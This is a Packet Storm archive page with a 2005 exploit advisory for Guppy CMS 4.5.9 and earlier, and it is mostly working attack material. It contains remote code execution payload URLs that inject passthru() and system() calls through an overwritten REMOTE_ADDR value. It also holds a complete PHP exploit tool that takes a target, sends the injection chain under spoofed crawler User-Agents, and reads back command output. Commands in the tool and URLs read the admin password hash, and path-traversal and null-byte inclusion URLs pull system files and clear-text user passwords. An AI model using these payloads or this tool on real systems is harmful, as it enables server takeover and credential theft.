what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

guppy459_xpl.txt

guppy459_xpl.txt
Posted Dec 1, 2005
Authored by rgod | Site retrogod.altervista.org

Guppy versions 4.5.9 and below suffer from remote code execution and arbitrary inclusion flaws. Full exploit provided.

tags | exploit, remote, arbitrary, code execution
SHA-256 | 968ffef02bac67138cf981ec650bc3a7d33b94c0c0c8eb860f158874ad6f9ca9

guppy459_xpl.txt

Change Mirror Download
Guppy <= 4.5.9 Remote code execution / various arbitrary inclusion issues

software:
site: http://www.freeguppy.org/
description: a very popular French PHP CMS that stores data in files


i) remote code/commands execution (tested and working against php 5.0.2 and php 4.3.3
with register globals off and magic quotes off):

vulnerable code in error.php at line 86-98:

server var $REMOTE_ADDR is not properly sanitized before to be stored in an .inc file
that will be included by the main script.

if register globals is off you can overwrite this var

also, if magic_quotes_gpc is off you can inject arbitrary php code, poc:

http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("ls -la>README");echo"

now I have an 20051128_162317_hacker.inc file with this code inside:

<?php
$err = "hacker";
$msg0 = "Unattended error";
$msg1 = "Unattended error";
$msg2 = "See the <a href='http://www.apachefrance.com/Articles/7/page2.html' alt=''>errors code HTTP</a>.";
$date = "Date : 28/11/2005 16:23";
$dest = "Page requested : ?";
$source = "Page source : ";
$browser = "Browser : ";
$addr_ip = "IP address : ";passthru("ls -la>README");echo"";
$domaine = "Domaine : ";
$with_mail = false;
?>

script has been executed and now you can go to:

http://[target]/[path_to_guppy]/README

to see the redirected output


also try this to see master database MD5 password hash:
http://[target]/[path_to_guppy]/error.php?err=hacker&_SERVER=&_SERVER[REMOTE_ADDR]=";passthru("cat ./admin/mdp.php>README");echo"

this is my proof of concept exploit tool:

<?php
# ---guppy459_xpl.php 17.30 28/11/2005 #
# #
# Guppy <=4.5.9 _SERVER[REMOTE_ADDR] overwrite / remote commands xctn #
# coded by rgod #
# site: http://rgod.altervista.org #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# Sun-Tzu:"To lift an autumn hair is no sign of great strength; to see the #
# sun and moon is no sign of sharp sight; to hear the noise of thunder is #
# no sign of a quick ear." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title> ******** Guppy <=4.5.9 remote commands xctn **********
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
******** Guppy <=4.5.9 remote commands xctn **********</p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.strip_tags($SERVER[PHP_SELF]).'"><p><input
type="text" name="host"> <span class="Stile5">* hostname (ex:www.sitename.com)
</span></p> <p><input type="text" name="path"> <span class="Stile5">* path (ex:
/guppy/ or just / ) </span></p><p><input type="text" name="command"> <span
class="Stile5"> * specify a command , "cat ./admin/mdp.php" to see master
database MD5 password hash( against windows: type .\admin\mdp.php) </span> </p>
<p> <input type="text" name="port"><span class="Stile5">specify a port other
than 80 ( default value ) </span></p> <p> <input type="text" name="proxy">
<span class="Stile5"> send exploit through an HTTP proxy (ip:port)</span></p>
<p><input type="submit" name="Submit" value="go!"></p></form> </td></tr></table>
</body></html>';


function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{

$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);

}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) { echo 'No response from '.htmlentities($host);
die; }
}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{

$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}
$host=$_POST[host];$path=$_POST[path];
$port=$_POST[port];$command=$_POST[command];
$proxy=$_POST[proxy];

if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);

#STEP 1 -> inject command...
$CODE='";error_reporting(0);ini_set("max_execution_time",0);system("'.$command.'>SUNTZU");echo"';
$CODE=urlencode($CODE);
$packet="GET ".$p."error.php?err=suntzu&_SERVER=&_SERVER[REMOTE_ADDR]=".$CODE." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+http://www.googlebot.com/bot.html)\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
#now you will be redirected to an error description page, we need to see this
#url to include/execute error file...
$temp=explode('location: ',$html);
$temp2=explode(chr(0x0d).chr(0x0a),$temp[1]);
$location=$temp2[0];
echo "Location ->".htmlentities($location)."<br>";

#STEP 2 -> Launch commands...
$packet="GET ".$p.$location." HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Internet Ninja x.0\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);

#STEP 3 -> lookin' for redirected output...
$packet="GET ".$p."SUNTZU HTTP/1.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Kenjin Spider\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
}

?>


ii)arbitrary local inclusion:

if register_globals on you can include an arbitrary style.inc file from local resources:
http://[target]/[path_to_guppy]/admin/editorTypetool.php?cmd=DIR&meskin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F

you can include an arbitrary file from local using null char:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../../../../../../../../../../boot.ini%00


you can include an arbitrary -web.inc or -admin.inc file from local resources
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../
or any file using a null byte
http://[target]/[path_to_guppy]/admin/inc/dbbatch.php?lng=../../../../../../../../../../../boot.ini%00

http://[target]/[path_to_guppy]/admin/inc/nwlmail.php?lng=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

through one of this inclusion issue you can retrieve any user clear test password, poc:
http://[target]/[path_to_guppy]/admin/inc/archbatch.php?lng=../../data/usermsg/username.dtb%00


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/guppy459_xpl.html


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close